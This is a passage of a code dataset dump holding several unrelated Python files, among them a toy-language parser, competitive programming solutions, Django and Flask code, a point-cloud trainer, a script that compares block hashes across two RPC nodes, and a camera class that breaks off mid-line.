idea about ability to nest the function definitions\n\nfrom lexer import *\nimport sys\n\n #throw the exceptions if the stream is not match.\n #part of idea is from Kaleb\n\nclass GrammarSyntaxError(Exception):\n def __init__(self, t, current):\n self.checkType = t\n self.lexType = current\n def __str__(self):\n return repr(self.checkType) + \", \" + repr(self.lexType)\n\ncurrentLexeme = None\ndef recognizer(filename):\n l = Lexer(filename)\n#set currentLexeme to be global to track the lexeme\n global currentLexeme\n currentLexeme = l.lex()\n #helper functions for recognizing\n def check(lType):\n return currentLexeme.type == lType\n\n def advance():\n global currentLexeme\n currentLexeme = l.lex()\n\n def match(lType):\n matchNoAdvance(lType)\n advance()\n\n def matchNoAdvance(lType):\n if not check(lType):\n raise GrammarSyntaxError(lType, currentLexeme.type)\n\n #Dr.Lusth reminded me through email about fucntion Def should be define, also Kaleb gave me the implement idea.\n def functionDef():\n match(DEF)\n match(ID)\n match(OPAREN)\n optParamsList()\n match(CPAREN)\n block()\n\n def functionDefPending():\n return check(DEF)\n\n def optParamsList():\n if paraListsPending():\n paramsList()\n\n def paraListsPending():\n return check(ID)\n\n def paramsList():\n match(ID)\n if check(COMMA):\n match(COMMA)\n paramsList()\n\n def block():\n match(OBRACE)\n optStatementList()\n match(CBRACE)\n\n def optStatementList():\n if statementListPending():\n statementList()\n\n def statementList():\n statement()\n if statementListPending():\n statementList()\n\n def statementListPending():\n return statementPending()\n \n #updated the statement, it can describe function as statement\n def statement():\n if exprPending():\n expr()\n match(SEMICOLON)\n elif ifStatementPending():\n ifStatement()\n elif whileStatementPending():\n whileStatement()\n elif forStatementPending():\n forStatement()\n elif functionDefPending():\n functionDef()#put a function def in statement, to describe my language, Dr.lusth's emailremind me and Kaleb helped me too.\n elif check(RETURN):\n match(RETURN)\n optExpr()\n match(SEMICOLON)\n else:\n match(PRINT)\n match(OPAREN)\n optExpr()\n match(CPAREN)\n match(SEMICOLON)\n \n def statementPending():\n return ifStatementPending() or whileStatementPending() or forStatementPending() or check(RETURN) or functionDefPending() or check(PRINT) or exprPending() \n\n def optExpr():\n if exprPending:\n expr()\n\n def expr():\n primary()\n if operatorPending():\n operator()\n expr()\n\n def exprPending():\n return primaryPending()\n\n def operator():\n if check(PLUS):\n match(PLUS)\n elif check(MINUS):\n match(MINUS)\n elif check(DIVIDEDBY):\n match(DIVIDEDBY)\n elif check(TIMES):\n match(TIMES)\n elif check(EXPO):\n match(EXPO)\n elif check(GREATERTHAN):\n match(GREATERTHAN)\n elif check(LESSTHAN):\n match(LESSTHAN)\n elif check(MOD):\n match(MOD)\n else:\n match(EQUAL)\n\n def operatorPending():\n return check(PLUS) or check(MINUS) or check(DIVIDEDBY) or check(TIMES) or check(EXPO) or check(MOD) or check(GREATERTHAN) or check(LESSTHAN) or check(EQUAL)\n\n #from previous grammar and Got idea from Dr.Lusth's lecture\n def primary():\n if check(INTEGER):\n match(INTEGER)\n elif check(REAL):\n match(REAL)\n elif check(STRING):\n match(STRING)\n elif check(OPAREN):\n match(OPAREN)\n expr()\n match(CPAREN)\n else:\n varExpr()\n\n def primaryPending():\n return check(INTEGER) or check(REAL) or check(STRING) or check(OPAREN) or varExprPending()\n\n def varExpr():\n match(ID)\n if check(OPAREN):\n match(OPAREN)\n optArgList()\n match(CPAREN)\n\n def varExprPending():\n return check(ID)\n\n def optArgList():\n if argListPending():\n argList()\n\n def argList():\n expr()\n if check(COMMA):\n match(COMMA)\n argList()\n\n def argListPending():\n return exprPending()\n\n def ifStatementPending():\n return check(IF)\n\n def ifStatement():\n match(IF)\n expr()\n block()\n optElif()\n optElse()\n\n def optElif():\n if check(ELIF):\n match(ELIF)\n expr()\n block()\n\n def optElse():\n if check(ELSE):\n match(ELSE)\n block()\n\n def optInit():#Kaleb came up with this idea, and i borrowed it\n if check(EQUAL):\n match(EQUAL)\n expr()\n\n def whileStatementPending():\n return check(WHILE)\n\n def whileStatement():\n match(WHILE)\n expr()\n block()\n\n def forStatementPending():\n return check(FOR)\n\n#check the range function if it has a ID or INTEGER inside\n def forStatement():\n match(FOR)\n match(ID)\n match(IN)\n match(RANGE)#keyword range reminded by Kaleb \n match(OPAREN)\n if check(ID):\n match(ID)\n match(COMMA)\n if check(ID):\n match(ID)\n match(CPAREN)\n block()\n else:\n match(INTEGER)\n match(CPAREN)\n block()\n\n\n else:\n match(INTEGER)\n match(COMMA)\n if check(ID):\n match(ID)\n match(CPAREN)\n block()\n else:\n match(INTEGER)\n match(CPAREN)\n block()\n\n try:\n statementList()\t\n print('legal')\n except GrammarSyntaxError as e:\n print('illegal') \n #need to print the syntaxError\n print('GrammarSyntaxError: expected lexeme of type {c}, got type {l}'.format(c = e.checkType, l = e.lexType))#format form from Kaleb\n sys.exit(1)\n\nrecognizer(sys.argv[1])\n","repo_name":"voidsteed/LineThemUp_Language","sub_path":"module/environment/recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43040169957","text":"# クエリ先読み\n# t == 0を先に読むことで、整数列Aの候補を作ることができる\n# 答えが一通りに定まる条件は、x <-> y にedgeを張った木について、x, yが連結であること\nimport sys\nsys.setrecursionlimit(10**6)\n\n\ndef main():\n n = int(input())\n q = int(input())\n query_list = []\n q0_list = []\n for _ in range(q):\n t, x, y, v = map(int, input().split())\n x -= 1\n y -= 1\n query_list.append((t, x, y, v))\n if t == 0:\n q0_list.append((x, y, v))\n\n # 先読み\n A = [0]*n\n q0_list.sort()\n for x, y, v in q0_list:\n # A[x] + A[y] = v\n A[y] = v - A[x]\n # print(A)\n\n # union find\n par = [i for i in range(n)]\n\n def find(x):\n if x == par[x]:\n return x\n par[x] = find(par[x])\n return par[x]\n\n def union(x, y):\n x = find(x)\n y = find(y)\n if x == y:\n return\n par[x] = y\n\n def same(x, y):\n return find(x) == find(y)\n\n for t, x, y, v in query_list:\n if t == 0:\n union(x, y)\n continue\n if same(x, y):\n # 答えが定まる場合\n real_a_x = v\n a_x = A[x]\n delta_a_x = real_a_x - a_x\n a_y = A[y]\n if abs(x-y) % 2 == 0:\n sign = 1\n else:\n sign = -1\n delta_a_y = sign * delta_a_x\n real_a_y = a_y + delta_a_y\n print(real_a_y)\n else:\n print('Ambiguous')\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/typical90_bp_1226.py","file_name":"typical90_bp_1226.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5447941726","text":"def count_char(str):\n \"\"\"\n calculates the number of characters in string\n \"\"\"\n #select unique chars\n unique_chars = set(str)\n #create dict\n chars_dict = {}.fromkeys(unique_chars, 0)\n #calculate number of characters in string\n count_of_char = {x: str.count(x) for x in chars_dict}\n return count_of_char\n\ncounted_string = input(\"Enter the counted string: \")\nprint('Calculated characters :', count_char(counted_string))\n\n\n","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"LitvischenkoYevhen/HW7.1/HW7_task_3.py","file_name":"HW7_task_3.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"27539911044","text":"from flask import Blueprint\nfrom flask_login import current_user, login_required\n\nfrom tracking.page_handlers.specification_update_handler import SpecificationUpdateHandler\n\nspecification_bp = Blueprint(\n 'specification_bp', __name__,\n template_folder='templates',\n static_folder='static',\n)\n\n\n@specification_bp.route('/update//////',\n methods=['GET', 'POST'])\n@login_required\ndef specification_update(**kwargs):\n return SpecificationUpdateHandler('specification_bp.specification_update', current_user, **kwargs).handle()\n","repo_name":"wahinipa/cupboard","sub_path":"www/tracking/routing/specification_routes.py","file_name":"specification_routes.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22135763005","text":"from django.db import router\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.contrib.admin import helpers\nfrom django.utils.translation import gettext as _\nfrom django.contrib.admin.utils import get_deleted_objects, model_ngettext\nfrom django.core.exceptions import PermissionDenied\nfrom django.template.response import TemplateResponse\n\nfrom papermerge.core.models import BaseTreeNode\n\"\"\"\nClasses in this module are designed to overwrite respective classes in\ndjango.contrib.admin.option. These classes are mixedin in class wished to\nto be altered. Class need to be inserted such way to be before altered class\nin MRO chain.\n\"\"\"\n\n\nclass BaseModelBoss:\n \"\"\"\n Mixin designed to overwrite methods from\n django.contrib.admin.options.BaseModelAdmin\n \"\"\"\n\n def get_field_queryset(self, db, db_field, request):\n \"\"\"\n If the ModelAdmin specifies ordering, the queryset should respect that\n ordering. Otherwise don't specify the queryset, let the field decide\n (return None in that case).\n \"\"\"\n qs = None\n related_admin = self.admin_site._registry.get(\n db_field.remote_field.model\n )\n if related_admin is not None:\n qs = db_field.remote_field.model._default_manager.using(db)\n ordering = related_admin.get_ordering(request)\n if ordering is not None and ordering != ():\n qs = qs.order_by(*ordering)\n\n return qs\n\n def save_model(self, request, obj, form, change):\n \"\"\"\n Save model per current user.\n \"\"\"\n obj.user = request.user\n super().save_model(request, obj, form, change)\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n \"\"\"\n Will show in dropdown box only folders/MPTT models of current user.\n \"\"\"\n if db_field.name == \"parent\":\n kwargs[\"queryset\"] = BaseTreeNode.objects.filter(user=request.user)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n def get_actions(self, request):\n actions = super().get_actions(request)\n if actions is not None and 'delete_selected' in actions:\n actions['delete_selected'] = (\n self.delete_selected_boss,\n 'delete_selected',\n _('Delete selected %(verbose_name_plural)s'))\n return actions\n\n def delete_selected_boss(self, modeladmin, request, queryset):\n \"\"\"\n Default action which deletes the selected objects.\n\n This action first displays a confirmation page which shows all the\n deletable objects, or, if the user has no permission one of the related\n childs (foreignkeys), a \"permission denied\" message.\n\n Next, it deletes all selected objects and redirects back to the change\n list.\n \"\"\"\n opts = modeladmin.model._meta\n app_label = opts.app_label\n # Check that the user has delete permission for the actual model\n for obj in queryset:\n if not modeladmin.has_delete_permission(request, obj):\n raise PermissionDenied\n\n using = router.db_for_write(modeladmin.model)\n # Populate deletable_objects, a data structure of all related objects\n # that will also be deleted.\n deletable_objects, model_count, x, y = get_deleted_objects(\n queryset, opts, request.user, modeladmin.admin_site, using)\n\n # The user has already confirmed the deletion.\n # Do the deletion and return None to display the change list\n # view again.\n if request.POST:\n n = queryset.count()\n if n:\n for obj in queryset:\n obj_display = str(obj)\n modeladmin.log_deletion(request, obj, obj_display)\n queryset.delete()\n modeladmin.message_user(\n request, _(\"Successfully deleted %(count)d %(items)s.\") % {\n \"count\": n, \"items\": model_ngettext(modeladmin.opts, n)\n }, messages.SUCCESS)\n # Return None to display the change list page again.\n return None\n\n objects_name = model_ngettext(queryset)\n\n title = _(\"Are you sure?\")\n\n context = dict(\n modeladmin.admin_site.each_context(request),\n title=title,\n objects_name=str(objects_name),\n deletable_objects=[deletable_objects],\n model_count=dict(model_count).items(),\n queryset=queryset,\n perms_lacking=False,\n protected=False,\n opts=opts,\n action_checkbox_name=helpers.ACTION_CHECKBOX_NAME,\n media=modeladmin.media,\n )\n\n request.current_app = modeladmin.admin_site.name\n\n # Display the confirmation page\n return TemplateResponse(\n request, modeladmin.delete_selected_confirmation_template or [\n \"admin/%s/%s/delete_selected_confirmation.html\" % (\n app_label, opts.model_name\n ),\n \"admin/%s/delete_selected_confirmation.html\" % app_label,\n \"admin/delete_selected_confirmation.html\"\n ], context)\n","repo_name":"solidnerd/papermerge","sub_path":"papermerge/boss/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"21524933768","text":"# This script is a simple test for the following conjecture:\n\n# Let S: N -> N be the sum of the digits of a positive integer.\n# For all A and B in N, S(A + B) = S(A) + S(B) - 9k, where k is an interger.\n\nfrom time import time\n\ndef sum_digits(n: int) -> int:\n parc = abs(n)\n sum_d = 0\n\n while parc > 0:\n sum_d += parc % 10\n parc //= 10\n\n return sum_d\n\ndef get_counterexmpl(max: int) -> (int, int):\n sums = get_sums(max)\n\n for a in range(max + 1):\n for b in range(a, max + 1):\n diff = sums[a + b] - sums[a] - sums[b]\n\n if not diff % 9 == 0:\n return (a, b)\n \n return None\n\ndef get_sums(max: int) -> list:\n output = []\n\n for i in range(2 * (max + 1) + 1):\n output.append(sum_digits(i))\n\n return output\n\n\nprint(\"\\nThis script is a simple test for the following conjecture:\\n\")\nprint(\"Let S: N -> N be the sum of the digits of a positive integer.\")\nprint(\"For all A and B in N, S(A + B) = S(A) + S(B) - 9k, where k is an interger.\\n\")\nmax_str = input(\"What value would you like to test the conjecture for? \")\nprint(\"\\nLOADING. . .\")\n\ntry:\n max = int(max_str)\n if max < 0:\n raise ValueError\n\n start = time()\n counterexmpl = get_counterexmpl(max)\n elepsed = time() - start\n\n print(\"LOADED. . . in {:.0f}ms\\n\".format(elepsed * 10**3))\n\n if counterexmpl == None:\n print(\"The conjecture is proved for all natural numbers smaller or equals to {}!\".format(max))\n else:\n (a, b) = counterexmpl\n print(\"The conjecture is disproved! Here's a counterexample: ({}, {})\".format(a, b))\nexcept:\n print(\"'{}' isn't a natural number!\".format(max_str))\n","repo_name":"PixelyIon/A-Conjecture-of-Mine","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37479974836","text":"import sys\nimport math\n\n# game loop\nwhile True:\n dic = {}\n for i in range(8):\n mountain_h = int(input()) # represents the height of one mountain.\n dic[i] = mountain_h\n \n cible = max(dic, key=dic.get)\n\n print(cible)","repo_name":"ScrimaliAnthony/CodinGame","sub_path":"Algorithmes/La Descente/la_descente.py","file_name":"la_descente.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14473529257","text":"#parametric plotter with animation \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import animation\r\nnum_steps = 100 #steps size for the animator \r\nplt.close('all')\r\nfig = plt.figure()\r\ninterval = 3 #specify the axes limits\r\nax = plt.axes(xlim=(-interval,interval),ylim = (-interval,interval))\r\n\r\n(myline,) = ax.plot([],[],lw=2) # ploter line \r\n(mypoint,) = ax.plot([],[],'ko',ms=5) # ploter pointer\r\n\r\ndef get_step(n,x,y,this_line,this_point):\r\n this_line.set_data(x[:n+1],y[:n+1])\r\n this_point.set_data(x[n],y[n])\r\n \r\ndef init():\r\n myline.set_data([],[])\r\n return myline\r\ndef animate(i):\r\n t = np.linspace(0,2*np.pi,(100*interval)/(interval+2))\r\n y = np.sin(t) #y(t)\r\n x = np.cos(t)#x(t)\r\n myline.set_data(x[:i+1],y[:i+1])\r\n mypoint.set_data(x[i],y[i])\r\n return myline\r\nanim = animation.FuncAnimation(fig,animate,init_func=init,frames = 2000,interval = 1)\r\n","repo_name":"FaisalAhmed0/Scientific-coding","sub_path":"parametricPlotter.py","file_name":"parametricPlotter.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24421956340","text":"#!/usr/bin/env python3\n'''\n13.01.2020 version 1.0\nproducing N random numbers with D digits:\n and append them \n start = 10^D, \n end = 10^(D+1)-1\n num = N \n'''\nimport argparse\nimport numpy as np\nimport random\nimport sys,os,shutil\n\nmy_parser = argparse.ArgumentParser(prog=\"random.py\",\n usage=\"%(prog)s -n -d [-f ] \",\n description='producing N random numbers with D digits',\n epilog=\"-n -d should assign\",\n prefix_chars=\"-\")\n\n# Execute the parse_args() method\nmy_parser.add_argument('-n', action='store', dest=\"N\", type=int, required=True,\n help=\"numbers of random number\")\nmy_parser.add_argument('-d', action='store', dest=\"D\", type=int, required=True,\n help=\"numbers of digits\") \nmy_parser.add_argument('-f', action='store', dest=\"file\", type=str, required=False,\n help=\"outfile to write to [optional]\") \n\nargs = my_parser.parse_args()\n \nN=int(args.N)\nD=int(args.D)\noutfile=args.file\n\n\n# Function to generate \nstart=int(pow(10,D-1))\nend=int(pow(10,(D)))-1\nnum = N\nprint(\"random integer between {} and {}\".format(start,end))\n#https://stackoverflow.com/questions/31742326/efficient-way-of-reading-integers-from-file\ndef read_dirs(list_dir):\n m = len(list_dir)\n list_dir = list(dict.fromkeys(list_dir))\n n = len(list_dir)\n if (m!=n): print(\"'{}' in saved', {}' duplicate(s) ignored\"\n .format(n,m-n))\n else: print(\"'{}'random numbers saved\".format(n))\n return list_dir\n\ndef checkDuplication(ListElem):\n for elem in ListElem:\n if ListElem.count(elem)>2:\n return True\n return False\n\nres = np.zeros(num)\n#res=np.chararray(num)\n\ndef Rand(start, end, num): \n for j in range(num): \n res[j] = (random.randint(start, end))\n return res \n\nif (outfile!=None):\n res=Rand(start, end, num)\n res=read_dirs(res)\n np.savetxt(outfile,[res],fmt='%d',newline=\" \")\nelse : print(Rand(start, end, num))\n","repo_name":"saeed-amiri/MYPYTHON","sub_path":"random_number.py","file_name":"random_number.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22910657769","text":"from konlpy.tag import Okt\nfrom ..utils.search import Search\nfrom library.fileHandler import Pickle\nfrom library.extract import Extract\n\nfrom ..utils.llm import Chain\nfrom ..utils.prompt import create_prompt_template\nokt = Okt()\n\nclass ChatbotService:\n def __init__(self) -> None:\n pass\n\n def get_bm25_answers(question, dataset):\n file_path = f'/Users/user/Python/bm25_bot/assets/{dataset}'\n p = Pickle(file_path)\n pkl_file = p.read_pkl()\n tokens = [v['normalized'] for v in pkl_file]\n\n question_token = Extract.tokenizer(question)\n\n top_idx, score = Search.tf_idf(question_token, tokens)\n answer_list = [{'content': pkl_file[idx]['content'], 'source': pkl_file[idx]['source'], 'score': score[idx], 'pages': pkl_file[idx]['pages']} for idx in top_idx]\n\n return answer_list\n\n def get_qdrant_answers(dataset, question):\n return Search.similaritySearch(dataset, question)\n\n def doc_to_object(docs, dataset):\n arr = []\n for doc in docs:\n arr.append({\n \"content\" : doc[0].page_content.replace('\\n', ' '),\n \"source\" : doc[0].metadata['source'].split('/')[-1],\n \"pages\" : str(doc[0].metadata['page']) if dataset == 'ctd_paged' else str(doc[0].metadata['pages']),\n \"score\" : str(doc[1])\n })\n return arr\n\n def chatWithLLM(bm25_answer_list, qdrant_answer_list, question):\n try:\n chat_prompt = create_prompt_template()\n info = Extract.make_pure_info(bm25_answer_list, qdrant_answer_list)\n\n return Chain.create(chat_prompt, info, question)\n except Exception as e:\n raise e","repo_name":"jumyeong33/chat_with_pdf","sub_path":"api/service/chatbotService.py","file_name":"chatbotService.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17898768120","text":"from importlib import import_module\nfrom SPConvNets import FragmentLoader, PointCloudPairSampler, Dataloader_3dmatch_eval\nfrom tqdm import tqdm\nimport torch\nimport vgtk\nimport vgtk.pc as pctk\nimport numpy as np\nimport os\nimport os.path as osp\n\nclass Trainer(vgtk.Trainer):\n def __init__(self, opt):\n super(Trainer, self).__init__(opt)\n\n if self.opt.train_loss.equi_alpha > 0:\n self.summary.register(['Loss', 'InvLoss', 'Pos', 'Neg', 'Acc', \\\n 'EquiLoss', 'EquiPos', 'EquiNeg', 'EquiAcc' ])\n else:\n self.summary.register(['Loss', 'Pos', 'Neg', 'Acc'])\n\n self.epoch_counter = 0\n self.iter_counter = 0\n\n def _setup_datasets(self):\n\n if self.opt.mode == 'train':\n dataset = FragmentLoader(self.opt, self.opt.model.search_radius, kptname=self.opt.dataset, \\\n use_normals=self.opt.model.normals, npt=self.opt.npt)\n\n sampler = PointCloudPairSampler(len(dataset))\n\n self.dataset_train = torch.utils.data.DataLoader(dataset, \\\n batch_size=self.opt.batch_size, \\\n shuffle=False, \\\n sampler=sampler,\n num_workers=self.opt.num_thread)\n self.dataset_iter = iter(self.dataset_train)\n\n\n if self.opt.mode == 'eval':\n self.dataset_train = None\n\n\n def _setup_eval_datasets(self, scene):\n dataset_eval = Dataloader_3dmatch_eval(self.opt, scene)\n self.dataset_eval = torch.utils.data.DataLoader(dataset_eval, \\\n batch_size=1, \\\n shuffle=False, \\\n num_workers=1)\n\n def _setup_model(self):\n param_outfile = osp.join(self.root_dir, \"params.json\")\n module = import_module('SPConvNets.models')\n self.model = getattr(module, self.opt.model.model).build_model_from(self.opt, param_outfile)\n\n\n def _setup_metric(self):\n self.anchors = self.model.get_anchor().to(self.opt.device)\n self.metric = vgtk.loss.TripletBatchLoss(self.opt,\\\n self.anchors,\n alpha = self.opt.train_loss.equi_alpha) \\\n\n # For epoch-based training\n def epoch_step(self):\n for it, data in tqdm(enumerate(self.dataset_train)):\n self._optimize(data)\n\n # For iter-based training\n def step(self):\n try:\n data = next(self.dataset_iter)\n except StopIteration:\n # New epoch\n self.epoch_counter += 1\n print(\"[DataLoader]: At Epoch %d!\"%self.epoch_counter)\n self.dataset_iter = iter(self.dataset_train)\n data = next(self.dataset_iter)\n self._optimize(data)\n\n\n def _prepare_input(self, data):\n in_tensor_src = data['src'].to(self.opt.device)\n in_tensor_tgt = data['tgt'].to(self.opt.device)\n nchannel = in_tensor_src.shape[-1]\n in_tensor_src = in_tensor_src.view(-1, self.opt.model.input_num, nchannel)\n in_tensor_tgt = in_tensor_tgt.view(-1, self.opt.model.input_num, nchannel)\n\n return in_tensor_src, in_tensor_tgt\n\n\n def _optimize(self, data):\n\n gt_T = data['T'].to(self.opt.device)\n\n in_tensor_src, in_tensor_tgt = self._prepare_input(data)\n\n y_src, yw_src = self.model(in_tensor_src)\n y_tgt, yw_tgt = self.model(in_tensor_tgt)\n \n self.optimizer.zero_grad()\n\n if self.opt.train_loss.equi_alpha > 0:\n self.loss, inv_info, equi_info = self.metric(y_src, y_tgt, gt_T, yw_src, yw_tgt)\n invloss, pos_loss, neg_loss, accuracy = inv_info\n equiloss, equi_accuracy, equi_pos_loss, equi_neg_loss = equi_info\n else:\n self.loss, accuracy, pos_loss, neg_loss = self.metric(y_src, y_tgt, gt_T)\n \n self.loss.backward()\n self.optimizer.step()\n\n # Log training stats\n if self.opt.train_loss.equi_alpha > 0:\n log_info = {\n 'Loss': self.loss.item(),\n 'InvLoss': invloss.item(),\n 'Pos': pos_loss.item(),\n 'Neg': neg_loss.item(),\n 'Acc': 100 * accuracy.item(),\n 'EquiLoss': equiloss.item(),\n 'EquiPos': equi_pos_loss.item(),\n 'EquiNeg': equi_neg_loss.item(),\n 'EquiAcc': 100 * equi_accuracy.item(),\n }\n else:\n log_info = {\n 'Loss': self.loss.item(),\n 'Pos': pos_loss.item(),\n 'Neg': neg_loss.item(),\n 'Acc': 100 * accuracy.item(),\n }\n self.summary.update(log_info)\n self.iter_counter += 1\n\n\n def _print_running_stats(self, step):\n stats = self.summary.get()\n self.logger.log('Training', f'{step}: {stats}')\n # self.summary.reset(['Loss', 'Pos', 'Neg', 'Acc', 'InvAcc'])\n\n def test(self):\n pass\n\n def eval(self, select):\n '''\n 3D Match evaluation.\n '''\n from SPConvNets.datasets import evaluation_3dmatch as eval3dmatch\n\n # set up where to store the output feature\n all_results = dict()\n for scene in select:\n assert osp.isdir(osp.join(self.opt.dataset_path, scene))\n print(f\"Working on scene {scene}...\")\n target_folder = osp.join('data/evaluate/3DMatch/', self.opt.experiment_id, scene, f'{self.opt.model.output_num}_dim')\n self._setup_eval_datasets(scene)\n self._generate(target_folder)\n # recalls: [tau, ratio]\n results = eval3dmatch.evaluate_scene(self.opt.dataset_path, target_folder, scene)\n all_results[scene] = results \n self._write_csv(all_results)\n print(\"Done!\")\n\n\n def _generate(self, target_folder):\n with torch.no_grad():\n self.model.eval()\n bs = self.opt.batch_size\n\n print(\"\\n---------- Evaluating the network! ------------------\")\n\n ################### EVAL LOADER ###############################3\n from tqdm import tqdm\n for it, data in enumerate(self.dataset_eval):\n sid = data['sid'].item()\n # scene = data['scene']\n\n checknan = lambda tensor: torch.sum(torch.isnan(tensor))\n \n print(\"\\nWorking on fragment id\", sid)\n n_keypoints = data['clouds'].shape[0]\n # 5000 x N x 3\n clouds = data['clouds'].to(self.opt.device).squeeze()\n npt = clouds.shape[0]\n\n feature_buffer = []\n for bi in tqdm(range(0, npt, bs)):\n in_tensor_test = clouds[bi : min(npt,bi+bs)]\n feature, _ = self.model(in_tensor_test)\n feature_np = feature.detach().cpu().numpy()\n if checknan(feature).item() > 0:\n feature_np = np.nan_to_num(feature_np)\n feature_buffer.append(feature_np)\n # print(\"Batch counter at %d/%d\"%(bi, npt), end='\\r')\n\n # target_folder = osp.join('data/evaluate/3DMatch/', self.opt.experiment_id, scene, f'{self.opt.model.output_num}_dim')\n os.makedirs(target_folder, exist_ok=True)\n feature_out = np.vstack(feature_buffer)\n out_path = osp.join(target_folder, \"feature%d.npy\"%sid)\n print(f\"\\nSaving features to {out_path}\")\n np.save(out_path, feature_out)\n ######################################################################\n\n\n def _write_csv(self, results):\n import csv\n from SPConvNets.datasets import evaluation_3dmatch as eval3dmatch\n csvpath_root = osp.join('trained_models/evaluate/3DMatch/', self.opt.experiment_id)\n os.makedirs(csvpath_root, exist_ok=True)\n csvpath = osp.join( csvpath_root, 'recall.csv')\n with open(csvpath, 'w', newline='') as csvfile:\n fieldnames = ['Scene'] + ['tau_%.2f'%tau for tau in eval3dmatch.TAU_RANGE]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for scene in results.keys():\n recalls = results[scene]\n row = dict()\n row['Scene'] = scene\n for tup in recalls:\n tau, ratio = tup\n row['tau_%.2f'%tau] = \"%.2f\"%ratio\n writer.writerow(row)\n\n ### print out the stats\n all_recall = []\n for scene in results.keys():\n tau, ratio = results[scene][0]\n print(\"%s recall is %.2f at tau %.2f\"%(scene, ratio, tau))\n all_recall.append(ratio)\n\n avg = np.array(all_recall).mean()\n print(\"Average recall is %.2f !\" % avg)\n \n","repo_name":"nintendops/EPN_PointCloud","sub_path":"SPConvNets/trainer_3dmatch.py","file_name":"trainer_3dmatch.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"21"} +{"seq_id":"70437324214","text":"import subprocess\nimport json\n\n# Start and end block numbers\nstartBlock = 180698860\nendBlock = 200000000\n\nURL1 = \"http://141.193.240.11:12000/evm\"\nURL2 = \"http://169.197.142.4:7000/evm\"\n\ndef fetchHash(blockNumber, url):\n # Convert block number to hexadecimal format\n hexBlockNumber = hex(blockNumber)\n\n # Use curl to make a request\n command = f'curl --data \\'{{\"method\":\"eth_getBlockByNumber\",\"params\":[\"{hexBlockNumber}\",true],\"id\":292771713,\"jsonrpc\":\"2.0\"}}\\' -H \"Content-Type: application/json\" -X POST {url} | jq'\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n output, error = process.communicate()\n\n # Parse the JSON response\n response = json.loads(output)\n\n return response[\"result\"][\"hash\"]\n\ndef binarySearchMismatch(start, end):\n if start > end:\n return None\n\n midBlock = (start + end) // 2\n\n hashA = fetchHash(midBlock, URL1)\n hashB = fetchHash(midBlock, URL2)\n\n if hashA != hashB:\n print(f\"Mismatched hash at block {midBlock}\")\n return midBlock\n\n # Search in the first half\n leftResult = binarySearchMismatch(start, midBlock-1)\n if leftResult:\n return leftResult\n\n # Search in the second half\n rightResult = binarySearchMismatch(midBlock+1, end)\n if rightResult:\n return rightResult\n\n# Start the search\nbinarySearchMismatch(startBlock, endBlock)\n","repo_name":"jbuice/TelosEVM-Binary-Tree-Search","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16813853384","text":"\"\"\"\n@author(s): Nathan Heidt, Jean Nassar\n\nThis creates streaming image instances using a usb camera, pi camera, or even a\nvideo file.\n\n\"\"\"\nimport enum\nfrom fractions import Fraction\nimport os\nimport time\n\nimport cv2\n\n# we import like this in case we're not on a raspberry pi\ntry:\n import picamera\n import picamera.array\nexcept ImportError:\n pass\n\n\nCameraType = enum.Enum('CameraType', 'pi cv custom')\n\n\nclass Camera(object):\n \"\"\"\n This class handles image source and streams.\n\n Parameters\n ----------\n source : str, int\n If passed the path to a video file, the Camera class will use that\n as the streaming source. If passed an integer, the class will use\n the index of the available attached camera devices.\n\n Attributes\n ----------\n previous_frame : cv2.Image\n This is an OpenCV datatype that holds the previous frame collected\n current_frame : cv2.Image\n This is an OpenCV datatype that holds the current frame\n camera : cv2.VideoCapture\n This class is used as a wrapper to stream frames from a video source\n instance : _Camera\n A singleton instance for camera access.\n camera_type : CameraType\n An enum used to reference the streaming source\n \"\"\"\n class _Camera(object):\n def __init__(self, source=None):\n self.previous_frame = None\n self.current_frame = None\n operating_system = os.uname()[-1]\n\n # if an rpi\n if source is None:\n if 'arm' in operating_system:\n self.camera_type = CameraType.pi\n else:\n self.camera_type = CameraType.cv\n else:\n self.camera_type = CameraType.custom\n\n if self.camera_type == CameraType.pi:\n self.camera = picamera.PiCamera()\n time.sleep(2)\n self.camera.resolution = (1280, 720)\n self.camera.framerate = Fraction(1, 6)\n self.camera.exposure_mode = 'off'\n self.camera.shutter_speed = 6000000\n self.camera.iso = 800\n elif self.camera_type == CameraType.cv:\n self.camera = 